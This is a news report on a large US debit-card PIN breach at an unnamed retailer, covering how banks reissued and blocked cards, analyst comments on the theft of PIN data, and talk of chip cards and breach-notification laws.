More banks in the US are reissuing debit cards following the security breach at an undisclosed retailer that forced Citibank to block PIN-based ATM transactions on card accounts in Canada, Russia and the UK earlier this week.
Regional US banks including PNC Financial, National City and First National Bank of Pennsylvania, have scrambled to close accounts and reissue debit cards following the breach. The banking industry has yet to issue a definitive statement on the incident, but it appears increasingly likley that the nation's banks have fallen victim to an industrial-scale hacking and card-skimming fraud.
Earlier this week Citibank imposed transaction blocks on an unspecified number of US card accounts after a series of fraudulent cash withdrawals at ATMs in the UK, Russia and Canada. The bank indicated that security problems stem from a breach at a US retailer, although no company name was disclosed.
National US banks including Bank of America, Wells Fargo and Washington Mutual have also blocked and reissued debit cards in recent weeks. Up to 600,000 cardholders are thought to be at risk.
Previously PIN-based debit cards were thought to be safe from hackers, but Gartner analyst Avivah Litan says the banks' actions show that this incident is one of "the largest PIN thefts to date", in which the fraudsters not only collected card numbers, but also encrypted PIN data and terminal keys for unscrambling the codes.
"Armed with the PIN block and terminal encryption key, the thieves can determine a cardholder's PIN, then create counterfeit cards that enable them to withdraw cash at ATM machines," says Litan.
Analysts believe the incident may lead the US banking community to reconsider its resistance to chip-based payment cards and force a nationwide flight from the less-secure mag-stripe standard.
Although the name of the retailer that suffered the breach hasn't been disclosed, speculation is mounting that the debit card data was obtained during an incident at office-supply firm OfficeMax although the company has denied any involvement in the incident.
The Payment Card Industry Data Security Standard (PCI), which defines how card and cardholder data should be managed and processed to keep it secure, expressly forbids retailers from storing PINs online, although compliance with the standard is believed to be under 20% in the US.
Congressman Barney Frank, the senior Democrat on the house financial services committee recently called on credit card companies to name and shame retailers who suffer security breaches.
Frank said he was considering introducing legislation that would force companies that have suffered security breaches to notify customers of the incident, or be identified publicly as the party responsible.